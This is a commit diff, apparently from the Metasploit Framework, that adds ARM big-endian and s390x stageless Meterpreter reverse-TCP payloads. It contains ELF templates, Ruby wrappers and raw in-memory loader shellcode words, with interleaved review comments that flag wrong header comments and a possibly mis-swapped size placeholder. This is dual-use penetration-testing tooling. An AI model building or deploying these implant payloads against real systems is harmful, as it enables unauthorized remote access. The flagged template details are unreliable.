ARMBe and Zarch stageless payload
msutovsky-r7 committed Feb 13, 2025
1 parent f4d49da commit eb4abf6
Showing 11 changed files with 106 additions and 15 deletions.
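--- a/data/templates/src/elf/exe/elf_armbe_template.s
+++ b/data/templates/src/elf/exe/elf_armbe_template.s
@@ -0,0 +1,34 @@
+BITS 32
+ehdr: ; Elf32_Ehdr
+db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
+db 0, 0, 0, 0, 0, 0, 0, 0 ;
+dw 0x0200 ; e_type = ET_EXEC for an executable
+dw 0x2800 ; e_machine = AARCH64
+dd 0x01000000 ; e_version
+dd 0x54800000 ; e_entry
+dd 0x34000000 ; e_phoff
+dd 0 ; e_shoff
+dd 0 ; e_flags
+dw 0x3400 ; e_ehsize
+dw 0x2000 ; e_phentsize
+dw 0x0100 ; e_phnum
+dw 0 ; e_shentsize
+dw 0 ; e_shnum
+dw 0 ; e_shstrndx
+
+ehdrsize equ $ - ehdr
+
+phdr: ; Elf32_Phdr
+
+dd 0x01000000 ; p_type = pt_load
+dd 0 ; p_offset
+dd 0x00800000 ; p_vaddr
+dd 0x00800000 ; p_paddr
+dd 0xefbeadde ; p_filesz
+dd 0xefbeadde ; p_memsz
+dd 0x07000000 ; p_flags = rwx
+dd 0x00100000 ; p_align
+
+phdrsize equ $ - phdr
+
+_start: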
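Review bot: The comment on the e_machine line is wrong: `dw 0x2800` stored big-endian is 0x0028 = EM_ARM (40), not AARCH64 (EM_AARCH64 is 183), and the ELFCLASS32 byte in e_ident plus the Elf32 layout agree with EM_ARM, so only the comment needs fixing: `dw 0x2800 ; e_machine = EM_ARM (40), stored big-endian`. A one-line header saying the template is assembled with NASM and therefore every multi-byte field is written pre-swapped (which is why the 0xdeadbeef size placeholder appears as `dd 0xefbeadde`) would help, because the zarch template added in the same commit spells its placeholder differently. The `;` after the eight padding bytes is an empty comment; `; e_ident padding` would do.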
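--- a/data/templates/src/elf/exe/elf_zarch_template.s
+++ b/data/templates/src/elf/exe/elf_zarch_template.s
@@ -0,0 +1,33 @@
+; build with:
+
+BITS 64
+
+
+ehdr: ; Elf32_Ehdr
+db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
+db 0, 0, 0, 0, 0, 0, 0, 0 ;
+dw 0x0200 ; e_type = ET_EXEC for an executable
+dw 0x1600 ; e_machine = PowerPC
+dd 0x01000000 ; e_version
+dq 0x7810000000000000 ; e_entry
+dq 0x4000000000000000 ; e_phoff
+dq 0 ; e_shoff
+dd 0 ; e_flags
+dw 0x4000 ; e_ehsize
+dw 0x3800 ; e_phentsize
+dw 0x0100 ; e_phnum
+dw 0 ; e_shentsize
+dw 0 ; e_shnum
+dw 0 ; e_shstrndx
+
+phdr: ; Elf32_Phdr
+dd 0x01000000 ; p_type = PT_LOAD
+dd 0x07000000 ; p_flags = rwx
+dq 0 ; p_offset
+dq 0x0010000000000000 ; p_vaddr
+dq 0x0010000000000000 ; p_paddr
+dq 0xDEADBEEF ; p_filesz
+dq 0xDEADBEEF ; p_memsz
+dq 0x0000100000000000 ; p_align
+
+_start: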
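Review bot: The p_filesz/p_memsz placeholders `dq 0xDEADBEEF` are not byte-swapped the way the armbe template in this commit does it (`dd 0xefbeadde`), so NASM emits ef be ad de 00 00 00 00, which read as a big-endian 64-bit field is 0xefbeadde00000000 rather than 0xdeadbeef; unless the big-endian path of to_exe_elf searches for that raw little-endian byte pattern, the size substitution will miss and the loader is handed an absurd segment size. If the patcher looks for the big-endian pattern (`[0xDEADBEEF].pack('N')`), the placeholder should be `dq 0xEFBEADDE00000000`, which puts de ad be ef in the low-order bytes — confirm against to_exe_elf before changing either side. Three comments are also wrong: `dw 0x1600` is 0x0016 = EM_S390 (22), not PowerPC, and the `Elf32_Ehdr`/`Elf32_Phdr` labels describe Elf64 layouts (dq fields, p_flags directly after p_type). The `; build with:` line at the top is empty and should carry the assembler invocation, as it presumably does in the sibling templates.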
Binary file added data/templates/template_armbe_linux.bin
Binary file not shown.
Binary file added data/templates/template_zarch_linux.bin
Binary file not shown.
Empty file.
Empty file.
Empty file.
Empty file.
25 changes: 25 additions & 0 deletions lib/msf/util/exe.rb
Expand Up @@ -1198,6 +1198,27 @@ def self.to_linux_armle_elf(framework, code, opts = {})
to_exe_elf(framework, opts, 'template_armle_linux.bin', code)
end

# self.to_linux_armbe_elf
#
# @param framework [Msf::Framework]
# @param code [String]
# @param opts [Hash]
# @option [String] :template
# @return [String] Returns an elf
def self.to_linux_armbe_elf(framework, code, opts = {})
to_exe_elf(framework, opts, 'template_armbe_linux.bin', code, true)
end

# self.to_linux_zarch_elf
#
# @param framework [Msf::Framework]
# @param code [String]
# @param opts [Hash]
# @option [String] :template
# @return [String] Returns an elf
def self.to_linux_zarch_elf(framework, code, opts = {})
to_exe_elf(framework, opts, 'template_zarch_linux.bin', code, true)
end
# self.to_linux_armle_elf_dll
#
# @param framework [Msf::Framework]
Expand Down Expand Up @@ -2209,6 +2230,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
to_linux_aarch64_elf(framework, code, exeopts)
when ARCH_ARMLE
to_linux_armle_elf(framework, code, exeopts)
when ARCH_ARMBE
to_linux_armbe_elf(framework, code, exeopts)
when ARCH_MIPSBE
to_linux_mipsbe_elf(framework, code, exeopts)
when ARCH_MIPSLE
Expand All @@ -2225,6 +2248,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
to_linux_ppc_elf(framework, code, exeopts)
when ARCH_PPCE500V2
to_linux_ppce500v2_elf(framework, code, exeopts)
when ARCH_ZARCH
to_linux_zarch_elf(framework, code, exeopts)
end
elsif plat && plat.index(Msf::Module::Platform::BSD)
case arch
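Review bot: In the first hunk there is no blank line between the `end` of to_linux_zarch_elf and the `# self.to_linux_armle_elf_dll` comment that follows it, unlike the armle and armbe definitions above; add one. Both new wrappers pass a bare `true` as the fifth positional argument of to_exe_elf, which says nothing at the call site, while the armle wrapper just above passes four; a named local, `big_endian = true` followed by `to_exe_elf(framework, opts, 'template_zarch_linux.bin', code, big_endian)`, or a trailing `# big_endian` comment would make the difference visible. The `@option [String] :template` tag is missing its hash name (`@option opts [String] :template`), though that is copied from the neighbouring docs. The two dispatch hunks (`when ARCH_ARMBE`, `when ARCH_ZARCH`) look consistent with the wrappers.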
Expand Up @@ -78,11 +78,8 @@ def generate(_opts = {})
0x0b70a0e3, # 0x1094: mov r7, #0xb 0x0b70a0e3
0x000000ef, # 0x1098: svc #0 0x000000ef
0xe0ffffeb, # 0x109c: bl #0x1024 0xe0ffffeb

payload.length,
0x00000123 # .word
].pack('V*')
fd_path = '/proc/self/fd/'.bytes.pack('C*') + "\x00" * 16
in_memory_loader + fd_path + payload
in_memory_loader + [payload.length, 0x00000123].pack('N*') + fd_path + payload
end
end
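Review bot: The two words now appended with `pack('N*')` — `payload.length` and `0x00000123` — lost the `# .word` note, and nothing in the method says why they must sit immediately after the `bl` word and before fd_path; presumably the `bl` target reads them at a fixed offset, so a comment should say so: `# big-endian words the loader reads right after its code: payload size, then the marker it checks — TODO confirm offset against the disassembly`. Naming the intermediate, `trailer = [payload.length, 0x00000123].pack('N*')`, and returning `in_memory_loader + trailer + fd_path + payload` would keep the line inside the 120-column guide. The opcode words above appear to be written pre-swapped so that `pack('V*')` yields big-endian bytes, which is exactly why the length words needed a different pack template; a one-line comment on `].pack('V*')` explaining that would spare the next reader the same puzzle. generate's signature is above the hunk, and this section's file header was not captured on the page, so this is presumably the armbe module.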
24 changes: 13 additions & 11 deletions modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
Expand Up @@ -3,10 +3,8 @@
# Current source: https://github.com/rapid7/metasploit-framework
##


# Module generated by tools/modules/generate_mettle_payloads.rb
module MetasploitModule

CachedSize = 1271304

include Msf::Payload::Single
Expand All @@ -17,18 +15,18 @@ def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter, Reverse TCP Inline',
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
'Author' => [
'Name' => 'Linux Meterpreter, Reverse TCP Inline',
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>',
'Brent Cook <brent_cook[at]rapid7.com>',
'timwr'
],
'Platform' => 'linux',
'Arch' => ARCH_ZARCH,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_zarch_Linux
'Platform' => 'linux',
'Arch' => ARCH_ZARCH,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_zarch_Linux
)
)
end
Expand All @@ -38,6 +36,10 @@ def generate(_opts = {})
scheme: 'tcp',
stageless: true
}.merge(mettle_logging_config)
MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec
payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec
in_memory_loader = [
0x0d80a738, 0x00019200, 0xf0004120, 0xf000a719, 0x015e0a00, 0x18621744, 0x1848a758, 0x00ae1a45, 0x58404000, 0x17331838, 0xa75800b2, 0x1a350a04, 0x17339200, 0xf000a758, 0x00011bf5, 0x1876a758, 0x000a1766, 0x1d651846, 0xc2490000, 0x00304240, 0xf000a758, 0x00011bf5, 0xa7580000, 0x19754720, 0x803aa758, 0x000e1bf5, 0x922ff001, 0x9270f002, 0x9272f003, 0x926ff004, 0x9263f005, 0x922ff006, 0x9273f007, 0x9265f008, 0x926cf009, 0x9266f00a, 0x922ff00b, 0x9266f00c, 0x9264f00d, 0x922ff00e, 0x4120f001, 0xa7380000, 0xa7480000, 0x0a0b0707, payload.length
].pack('N*')
in_memory_loader + payload
end
end
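Review bot: The `in_memory_loader` added in generate is 44 undocumented 32-bit words on a single line, where the arm loader in this commit annotates each word with its address and mnemonic; at minimum a header comment is needed — what the stub does (the `922f…`/`9270…` run appears to store a `/proc/self/fd/` string byte by byte before the final `0a0b` supervisor call), that the words are pre-swapped for big-endian `pack('N*')`, and that `payload.length` must stay the last word because the code presumably reads it at a fixed offset — and the blob should be broken into lines of eight words so it can be diffed. `CachedSize = 1271304` in the first hunk is unchanged although generate now prepends the loader, so it is likely stale and should be recomputed. The file still says it is generated by tools/modules/generate_mettle_payloads.rb, yet generate is now hand-written; re-running the generator would clobber this, so either teach the generator about the loader or drop that comment.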
